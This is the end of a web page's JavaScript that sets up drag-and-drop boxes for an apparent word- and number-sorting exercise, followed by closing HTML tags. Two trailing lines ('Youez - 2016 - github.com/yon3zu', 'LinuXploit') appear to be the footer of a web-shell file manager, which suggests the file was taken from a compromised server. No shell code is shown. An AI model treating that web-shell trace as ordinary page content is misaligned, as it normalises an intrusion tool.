            webkit_drop.add('id_dropBox_no4', {onOver : function(){shared_highlight('id_dropBox_no4')}, onOut : function(){shared_un_highlight('id_dropBox_no4')}, onDrop : function(){DragDrop('id_dropBox_no4',['id_span_no4'])}});
			webkit_drop.add('id_dropBox_no2_or_3_1', {onOver : function(){shared_highlight('id_dropBox_no2_or_3_1')}, onOut : function(){shared_un_highlight('id_dropBox_no2_or_3_1')}, onDrop : function(){DragDrop('id_dropBox_no2_or_3_1', ['id_span_no2_1', 'id_span_no2_2', 'id_span_no3_1', 'id_span_no3_2'])}});
            webkit_drop.add('id_dropBox_no2_or_3_2', {onOver : function(){shared_highlight('id_dropBox_no2_or_3_2')}, onOut : function(){shared_un_highlight('id_dropBox_no2_or_3_2')}, onDrop : function(){DragDrop('id_dropBox_no2_or_3_2', ['id_span_no2_1', 'id_span_no2_2', 'id_span_no3_1', 'id_span_no3_2'])}});
            
            webkit_drop.add('id_dropBox_wordRight', {onOver : function(){shared_highlight('id_dropBox_wordRight')}, onOut : function(){shared_un_highlight('id_dropBox_wordRight')}, onDrop : function(){DragDrop('id_dropBox_wordRight', ['id_span_wordRight1', 'id_span_wordRight2'])}});
            
			webkit_drop.add('id_dropBox_wordLeft', {onOver : function(){shared_highlight('id_dropBox_wordLeft')}, onOut : function(){shared_un_highlight('id_dropBox_wordLeft')}, onDrop : function(){DragDrop('id_dropBox_wordLeft',  ['id_span_wordLeft1', 'id_span_wordLeft2'])}});
            
            webkit_drop.add('id_dropBox_word_left_or_right_1', {onOver : function(){shared_highlight('id_dropBox_word_left_or_right_1')}, onOut : function(){shared_un_highlight('id_dropBox_word_left_or_right_1')}, onDrop : function(){DragDrop('id_dropBox_word_left_or_right_1', ['id_span_wordRight1', 'id_span_wordRight2', 'id_span_wordLeft2', 'id_span_wordLeft1'])}});
            
            webkit_drop.add('id_dropBox_word_left_or_right_2', {onOver : function(){shared_highlight('id_dropBox_word_left_or_right_2')}, onOut : function(){shared_un_highlight('id_dropBox_word_left_or_right_2')}, onDrop : function(){DragDrop('id_dropBox_word_left_or_right_2', ['id_span_wordRight1', 'id_span_wordRight2', 'id_span_wordLeft2', 'id_span_wordLeft1'])}});
            
			webkit_drop.add('id_tr_no10', {onOver : function(){shared_highlight('id_dropBox_no10')}, onOut : function(){shared_un_highlight('id_dropBox_no10')}, onDrop : function(){DragDrop('id_dropBox_no10', ['id_span_no10'])}});
            
            webkit_drop.add('id_tr_no2', {onOver : function(){shared_highlight('id_dropBox_no2')}, onOut : function(){shared_un_highlight('id_dropBox_no2')}, onDrop : function(){DragDrop('id_dropBox_no2', ['id_span_no2_1', 'id_span_no2_2'])}});
            
            webkit_drop.add('id_tr_no8', {onOver : function(){shared_highlight('id_dropBox_no8')}, onOut : function(){shared_un_highlight('id_dropBox_no8')}, onDrop : function(){DragDrop('id_dropBox_no8', ['id_span_no8'])}});
            
            </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit